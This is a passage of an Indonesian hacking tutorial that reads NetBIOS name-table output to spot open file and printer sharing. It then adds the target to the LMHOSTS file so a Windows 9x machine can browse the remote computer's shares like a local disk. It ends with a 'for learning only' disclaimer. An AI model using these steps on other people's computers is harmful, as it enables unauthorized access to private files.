Name Type Status --------------------------------------------- BELOG <00> UNIQUE Registered POLOS <00> GROUP Registered BELOG <03> UNIQUE Registered BELOG <20> UNIQUE Registered POLOS <1e> GROUP Registered
---------------------------------------------
Jika muncul pesan Host not found, segera hentikan usaha anda, karena akan buang waktu sia sia :)
Jika muncul pesan indah seperti diatas, sebaiknya anda tarik napas, karena perkerjaan lain akan menunggu. Dari pesan indah tersebut yang menjadi catatan adalah karakter dengan kode BELOG <20> UNIQUE Registered, karena angka 20 ini adalah informasi file dan printer sharing.
Apa langkah kita selanjutnya ? Setelah kita mempunyai info diatas, cari file yang bernama : LMHOST atau HOST (win 9x)
Jika sudah ketemu, buka dengan editor seperti noteped dan tambahkan : 192.168.1.1 BELOG
Kemudian simpan.
Selanjutnya Click Start-->Find-->Computer masukan nama atau ipnya
Dan anda pasti akan berteriak girang, karena komputer remote sudah bisa anda jadikan seperti HD secondary anda :)
Selamat :) nb : sekali lagi, mohon tulisan ini hanya sebagai bahan pembelajaran saja dan bukan digunakan untuk merusak dan dari tulisan ini saya berharap, kita jangan seenaknya membuka file/printer sharing